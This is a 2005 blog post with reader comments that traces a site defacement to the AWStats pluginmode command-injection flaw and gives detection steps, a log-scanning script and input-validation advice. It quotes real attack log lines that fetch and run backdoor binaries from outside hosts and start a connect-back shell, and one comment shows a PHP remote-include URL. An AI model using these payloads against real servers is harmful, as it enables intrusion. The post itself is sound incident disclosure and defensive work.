Chovy’s Blog

Simiens Crew 2005 - How They Did It!

Wed, February 2, 2005 — Category: Personal

Updated: Awstats 6.4 fixes even more security holes. Please upgrade to 6.4

One of my sites got hacked on Feb. 1, 2005, they changed the index.html and put “Simiens Crew 2005, Enquanto Houver Fome Morte Guerra Simiens Existira”

I’ve heard people suspect both a PHP vulnerability and Awstats, both of which I’m using.

I’m using PHP Version 4.3.10 and Advanced Web Statistics 6.1 (build 1.751) (awstats)

I just checked the awstats homepage:

“Warning, a security hole was recently found in AWStats versions from 5.0 to 6.2 when AWStats is used as a CGI: A remote user can execute arbitrary commands on your server using permissions of your web server user (in most cases user “nobody”). If you use AWStats with another version or with option AllowToUpdateStatsFromBrowser to 0, you are safe. If not, it is highly recommended to update to 6.3 version that fixes this security hole.”

http://awstats.sf.net

Here’s some more info, and how I traced it down to awstats…

Here’s an excerpt from my clsearch.org log file:

tt.txt is a binary, which they ran (no idea what it did):

system("cd%20/tmp;wget%20protus.com.br/tt.txt;chmod%20777%20tt.txt;./tt.txt);

and dc.zip is also a binary they downloaded and ran:

system("wget%20gotmoney.100free.com/dc.zip");

An email to my provider: You also have several hacked instances on your server in /tmp, most of which are binaries, two of which are perl scripts. One of the perl scripts attempts to connect to an IRC server, the same server that the people who hacked my site have a channel on, #simiens. I couldn’t uncompress dc.zip (which was downloaded in my log files, but I suspect dc.pl is what it contained - who knows what else, as it was an executable binary).

Some other nefarious things in /tmp on Neureal’s server:

brk2
cgi
ct
ct.1
dc.pl
index.html (contains a meta-refresh to some Japanese online shopping site)
nbot.pl
r0nin

(The source for the two Perl scripts can be found here)

To find exploitable awstats configuration files (the glob is quoted so the shell does not expand it before find sees it):
find . -name 'awstats*.conf' | xargs cat | grep 'AllowToUpdateStatsFromBrowser=1'

Replace all those instances so it’s set to 0 instead, otherwise your customers will be exposed until you upgrade awstats.

Traverse the ./logs directory looking for exploits in the log files (67.169.x.x is my own IP, we’ll weed those out with grep -v):

find . -name "*.gz" | xargs zcat | grep awstats.pl | grep -v 67.169.x.x | less

Here’s the attack as it happened in my log file:

200.158.37.192 - - [29/Jan/2005:13:57:05 -0500] "GET /cgi-bin/awstats.pl?pluginmode=:system("/bin/ls"); HTTP/1.1" 200 3294 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar4.5.3.0; .NET CLR 1.1.4322)"
200.158.37.192 - - [29/Jan/2005:13:57:11 -0500] "GET /cgi-bin/awstats.pl?pluginmode=:system("uname%20-a"); HTTP/1.1" 200 3302 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar4.5.3.0; .NET CLR 1.1.4322)"
200.158.37.192 - - [29/Jan/2005:13:57:33 -0500] "GET /cgi-bin/awstats.pl?pluginmode=:system("cd%20/tmp;wget%20protus.com.br/tt.txt;chmod%20777%20tt.txt;./tt.txt"); HTTP/1.1" 200 3207 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar4.5.3.0; .NET CLR 1.1.4322)"
200.158.37.192 - - [29/Jan/2005:13:58:07 -0500] "GET /cgi-bin/awstats.pl?pluginmode=:system("cd%20/tmp;ls"); HTTP/1.1" 200 6902 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar4.5.3.0; .NET CLR 1.1.4322)"
200.158.37.192 - - [29/Jan/2005:13:58:13 -0500] "GET /cgi-bin/awstats.pl?pluginmode=:system("wget"); HTTP/1.1" 200 3302 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar4.5.3.0; .NET CLR 1.1.4322)"
200.158.37.192 - - [29/Jan/2005:13:58:32 -0500] "GET /cgi-bin/awstats.pl?pluginmode=:system("cd%20/tmp;wget%20protus.com.br/tt.txt;chmod%20777%20tt.txt;./tt.txt); HTTP/1.1" 200 3273 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar4.5.3.0; .NET CLR 1.1.4322)"
200.158.37.192 - - [29/Jan/2005:13:58:40 -0500] "GET /cgi-bin/awstats.pl?pluginmode=:system("cd%20/tmp;wget%20protus.com.br/tt.txtt); HTTP/1.1" 200 3273 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar4.5.3.0; .NET CLR 1.1.4322)"
200.158.37.192 - - [29/Jan/2005:13:58:43 -0500] "GET /cgi-bin/awstats.pl?pluginmode=:system("cd%20/tmp;wget%20protus.com.br/tt.txt); HTTP/1.1" 200 3273 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar4.5.3.0; .NET CLR 1.1.4322)"
200.158.37.192 - - [29/Jan/2005:13:58:53 -0500] "GET /cgi-bin/awstats.pl?pluginmode=:system("id"); HTTP/1.1" 200 3272 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar4.5.3.0; .NET CLR 1.1.4322)"
200.158.37.192 - - [29/Jan/2005:13:59:02 -0500] "GET /cgi-bin/awstats.pl?pluginmode=:system("wget%20protus.com.br/tt.txt"); HTTP/1.1" 200 3215 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar4.5.3.0; .NET CLR 1.1.4322)"
200.158.37.192 - - [29/Jan/2005:13:59:10 -0500] "GET /cgi-bin/awstats.pl?pluginmode=:system("chmod%20777%20tt.txt"); HTTP/1.1" 200 3215 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar4.5.3.0; .NET CLR 1.1.4322)"
200.158.37.192 - - [29/Jan/2005:13:59:15 -0500] "GET /cgi-bin/awstats.pl?pluginmode=:system("./tt.txt"); HTTP/1.1" 200 3293 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar4.5.3.0; .NET CLR 1.1.4322)"
200.158.37.192 - - [29/Jan/2005:13:59:47 -0500] "GET /cgi-bin/awstats.pl?pluginmode=:system("wget%20gotmoney.100free.com/dc.zip"); HTTP/1.1" 200 3215 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar4.5.3.0; .NET CLR 1.1.4322)"
200.158.37.192 - - [29/Jan/2005:13:59:52 -0500] "GET /cgi-bin/awstats.pl?pluginmode=:system("chmod%20777%20dc.zip"); HTTP/1.1" 200 3215 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar4.5.3.0; .NET CLR 1.1.4322)"
200.158.37.192 - - [29/Jan/2005:14:00:32 -0500] "GET /cgi-bin/awstats.pl?pluginmode=:system("./dc.zip%20200.204.170.225%206262"); HTTP/1.1" 200 3327 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar4.5.3.0; .NET CLR 1.1.4322)"
200.158.37.192 - - [29/Jan/2005:14:01:10 -0500] "GET /cgi-bin/awstats.pl?pluginmode=:system("./dc.zip%20200.204.170.225%206262"); HTTP/1.1" 200 3334 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar4.5.3.0; .NET CLR 1.1.4322)"
200.158.37.192 - - [29/Jan/2005:14:01:46 -0500] "GET /cgi-bin/awstats.pl?pluginmode=:system("./dc.zip%20200.204.170.225%205050"); HTTP/1.1" 200 3334 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar4.5.3.0; .NET CLR 1.1.4322)"
200.158.37.192 - - [29/Jan/2005:14:02:52 -0500] "GET /cgi-bin/awstats.pl?pluginmode=:system("./dc.zip%20www.asianashop.com%206262"); HTTP/1.1" 200 3334 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar4.5.3.0; .NET CLR 1.1.4322)"
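The search the grep pipeline above does by hand, as an added example that is not part of the original post: it parses combined-format log lines, decodes the query string of every awstats.pl request, flags any pluginmode value that is not a bare word, and skips your own addresses the way grep -v does. The log lines embedded in it are constructed (documentation IPs), not the ones from the excerpt.

```python
import re
from urllib.parse import unquote

# Apache "combined" format, which is what the excerpt above is in.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
# A legitimate pluginmode is a bare word; quotes, colons, parentheses or ';' are not.
SAFE_PLUGINMODE = re.compile(r'^[A-Za-z0-9_]*$')

def parse_line(line):
    """Split one log line into its fields, or return None if it is not combined format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def query_params(query):
    """Decode key=value pairs by hand: the attack values contain ';', which some
    versions of urllib's parse_qsl treat as a pair separator."""
    pairs = []
    for part in query.split('&'):
        key, _, value = part.partition('=')
        pairs.append((unquote(key), unquote(value)))
    return pairs

def suspicious_awstats_requests(lines, own_ips=()):
    """Return (ip, timestamp, decoded pluginmode) for every awstats.pl hit whose
    pluginmode is not a bare word, skipping requests from your own addresses."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec['ip'] in own_ips:
            continue
        path, _, query = rec['url'].partition('?')
        if not path.endswith('/awstats.pl'):
            continue
        for key, value in query_params(query):
            if key == 'pluginmode' and not SAFE_PLUGINMODE.match(value):
                hits.append((rec['ip'], rec['ts'], value))
    return hits

# Constructed sample lines (documentation IPs); 198.51.100.7 plays the admin's own IP.
UA = '"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"'
SAMPLE_LOG = [
    '203.0.113.5 - - [29/Jan/2005:13:50:01 -0500] "GET /cgi-bin/awstats.pl?config=example.org&output=main HTTP/1.1" 200 31240 ' + UA,
    '192.0.2.10 - - [29/Jan/2005:13:57:11 -0500] "GET /cgi-bin/awstats.pl?pluginmode=:system("uname%20-a"); HTTP/1.1" 200 3302 ' + UA,
    '198.51.100.7 - - [29/Jan/2005:14:05:00 -0500] "GET /cgi-bin/awstats.pl?pluginmode=:system("id"); HTTP/1.1" 200 3272 ' + UA,
    '203.0.113.5 - - [29/Jan/2005:14:06:30 -0500] "GET /index.html HTTP/1.1" 200 512 ' + UA,
]
```

Run it over `zcat` output instead of SAMPLE_LOG to get the same list the pipeline above produces, with the payload already URL-decoded.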

REMEMBER: Always check user input when you’re coding. Restrict it to only what you deem acceptable input, i.e. if it’s a phone number, use a regexp to weed out everything but digits, for example in Perl:

if ($phone =~ m/^\d{3}-\d{3}-\d{4}$/) {
    # phone ok: exactly ddd-ddd-dddd and nothing else gets through
}

Obviously, international phone numbers won’t work, but you get the idea. Same goes for ANYTHING you pass to the system() command, which is how they hacked this server.
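The same check carried through to the system() call, as an added example (not the post’s or AWStats’ code, written in Python rather than the Perl above): every CGI parameter is matched against its own allowlist, anything else is rejected rather than cleaned up, and the command is built as an argv list so no shell ever parses it. The parameter names config, output and pluginmode are AWStats’ own; the value shapes and the awstats.pl path are assumptions.

```python
import re
import subprocess

# Per-parameter allowlists: say exactly what is acceptable and reject the rest.
# Names are AWStats' CGI parameters; the permitted shapes are assumptions.
PARAM_RULES = {
    'config':     re.compile(r'[A-Za-z0-9][A-Za-z0-9._-]{0,63}'),
    'output':     re.compile(r'[a-z]{0,32}'),
    'pluginmode': re.compile(r'[a-z0-9_]{0,32}'),
}
# The Perl phone check above; fullmatch also refuses a trailing newline, which '$' lets through.
PHONE_RE = re.compile(r'\d{3}-\d{3}-\d{4}')

def phone_ok(phone):
    return PHONE_RE.fullmatch(phone) is not None

def validate_params(params):
    """Return only the parameters that pass their allowlist; raise on anything else.

    Rejecting is the right response: stripping "bad" characters out of a value like
    ':system("id");' still leaves you guessing what the rest would do in a shell.
    """
    clean = {}
    for key, value in params.items():
        rule = PARAM_RULES.get(key)
        if rule is None or rule.fullmatch(value) is None:
            raise ValueError('rejected parameter %s=%r' % (key, value))
        clean[key] = value
    return clean

def accepts(params):
    """True if every parameter passes validate_params (handy for checks and tests)."""
    try:
        validate_params(params)
        return True
    except ValueError:
        return False

def build_update_command(params):
    """Build argv for an AWStats update run from validated parameters.

    A list is executed without a shell, so even a metacharacter that slipped past
    the allowlist would reach awstats.pl as one literal argument, not as syntax.
    """
    clean = validate_params(params)
    if 'config' not in clean:
        raise ValueError('config is required')
    # -config= and -update are awstats.pl's own options; the script path is assumed.
    return ['perl', '/usr/lib/cgi-bin/awstats.pl', '-config=' + clean['config'], '-update']

def run_update(params):
    """Execute the update; shell=False is subprocess.run's default, so the list stays a list."""
    return subprocess.run(build_update_command(params), check=True)
```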

This stresses the point of also keeping your software (hopefully it’s open source) up-to-date. Bugs in open source software get discovered and patched overnight, sometimes within hours of discovery. Just try to get a corporate conglomerate to “fix” their bug and have it available to you in that amount of time (they’ll even throw in a new licensing fee in order for you to get the fix). :-)

If anyone knows how to disassemble an executable to find out what it does, you can find their code here (beware, I wouldn’t run it on my machine).

20 Comments »


Comment by Anonymous

February 4, 2005 @ 6:08 pm

Hi…

We *anon* just got done over with same hack..
except the f**kin looser who did it used his own webserver to upload the backdoor code from etc..

anyway.. wanted to say I greatly appreciated finding your article.. and source codes… it has helped..

nice work dude


Comment by LifeSteward

February 8, 2005 @ 12:33 pm

We had about a dozen hit last night. I was using AwStats 6.1 and hadn’t heard of this yet. They also deleted all the files and directories containing “log”, so I couldn’t look at the log files. Worst yet, the LOGO images and many “blog” files were deleted as well. Lots of fun.

I posted about it at my blog.


Comment by PoiSQueM

February 11, 2005 @ 10:35 am

Hey Chovy,

I’ve an incident here in my company too. All the users’ pages have been compromised and the index.html overwritten by “Simiens Crew 2005, Enquanto Houver Fome Morte Guerra Simiens Existira”.

Just complementing your nice job, I took a look at those executables and both are backdoor programs. tt.txt opens a socket on port 3333 and dc.zip is a reverse shell.

I couldn’t reproduce this on my website. Any idea?
Latter…


Comment by Anonymous

February 19, 2005 @ 1:07 pm

My website was hit by this attack as well. Thank you very much for your quick detective work. Really appreciate it.


Comment by Anonymous

February 20, 2005 @ 4:37 pm

My site was hit. All index.php pages were changed. They all now have the monkey on it. Does anyone know who done this? I wished someone would prosecute them. My site deals with issues such as miscarriages, child loss, etc..
And to really kick things in the butt these losers done it at a time when my family had a loss. I hope they are able to sleep at night.


Comment by chovy

February 22, 2005 @ 5:59 am

Don’t take it personally, they’ve hit thousands of sites, because they were vulnerable. I don’t know exactly what the Portuguese means, but somewhere I read it had some political motivation behind it. Best thing you can do is join the security announcements mailing list for your linux distro (god help you if you use Microsoft).


Comment by Anonymous

March 1, 2005 @ 5:04 pm

“enquanto houver fome morte guerra Simiens existira” roughly translates to “while there is hunger, death, and war, Simiens will exist.”


Comment by chovy

March 1, 2005 @ 7:38 pm

Hmmm….and they’re solving that problem by hacking sites. Why didn’t I think of that?


Comment by Anonymous

March 3, 2005 @ 12:06 pm

Hey..
if you open that
Welcome to Data Cha0s Connect Back Shell, Data Cha0s Connect Back Backdoor, lots of reference to .h files, tt.txt, dc.zip, lots of stuff.. Searching on google for “Data cha0s” finds loads of stuff about this PHP script.. Adding “hax0r” to the search finds a site defaced by “Data Cha0s”..
.. Fecking crackers..
- Ben


Comment by Anonymous

March 3, 2005 @ 7:49 pm

Hey, where can i download EphPod?


Comment by Anonymous

March 12, 2005 @ 8:47 pm

I got hacked by the bastards, index file replaced with

Simiens - Fudendo ate a orelha

I did not even have a backup


Comment by Anonymous

March 14, 2005 @ 9:25 am

Thank you for your info. I was also a victim of this and I found your writeup to be valuable.

- Mike


Comment by Anonymous

April 5, 2005 @ 1:39 pm

In my case, they only got wwwrun daemon privileges and they couldn’t delete the log files. I have it all registered, the source IP, the server from which they downloaded the tar ball to install the backdoor binaries… I am in doubt whether to report the case to the police.


Comment by chovy

April 5, 2005 @ 2:10 pm

police will do absolutely nothing. Unless you need a report for insurance purposes. They are not going to be much help to you.

Simiens is based in Brazil I believe anyway. Only thing you could do is report them to their ISP, but then again, they were probably using a hacked box anyway, and it wasn’t really their IP that you’re seeing, in fact it was someone else who is also a victim.


Comment by drtester

April 17, 2005 @ 11:05 pm

I just got hacked, and they downloaded the rootkit code from your site here, which is how I found this site. Probably not a good idea to keep the code up like this, as you might involuntarily be helping them hack more servers like mine.


Comment by Anonymous

June 3, 2005 @ 3:42 pm

” Hi…We *anon* just got done over with same hack..
except the f**kin looser who did it used his own webserver to upload the backdoor code from etc..”

Now that’s fukkin funny. What loosers. Talk about stupid hackers.


Comment by chovy

June 3, 2005 @ 4:00 pm

not the brightest folk, but how do you know it was his server?

I mean, i have the source for the rootkit on my server, and hackers are downloading it from me, I was kind of torn on whether or not to keep it up. There’s no way to really let people see it and read the source, without also giving the hackers access.


Comment by Anonymous

June 27, 2005 @ 7:24 pm

Just as information, “Simiens - Fudendo ate a orelha” is the portuguese for “Simiens - F*cking all the way to the ear”


Comment by r0nin-buttkicker

July 28, 2005 @ 2:10 pm

My server had php script like this:

www.mydomain.com/index.php?request=abc

and abc was a PHP script that was included like this:
=======
<?php
include 'header.php';
include $request . '.php';   // $request comes straight from the query string
include 'footer.php';
?>
========

From my web logs, my site was called like:
www.mydomain.com/index.php?request=http://f58.aaa.livedoor.jp/~picapau/tool25.dat?&cmd=w

where the funny japanese site has the php script that did all the damage.

I am busy rewriting the index.php.

Hope it helps.

Comment by HAILEY RHEA

November 29, 2006 @ 10:40 pm

I think this is an excellent post. I was referred by ProBlogger (as have many, no doubt).
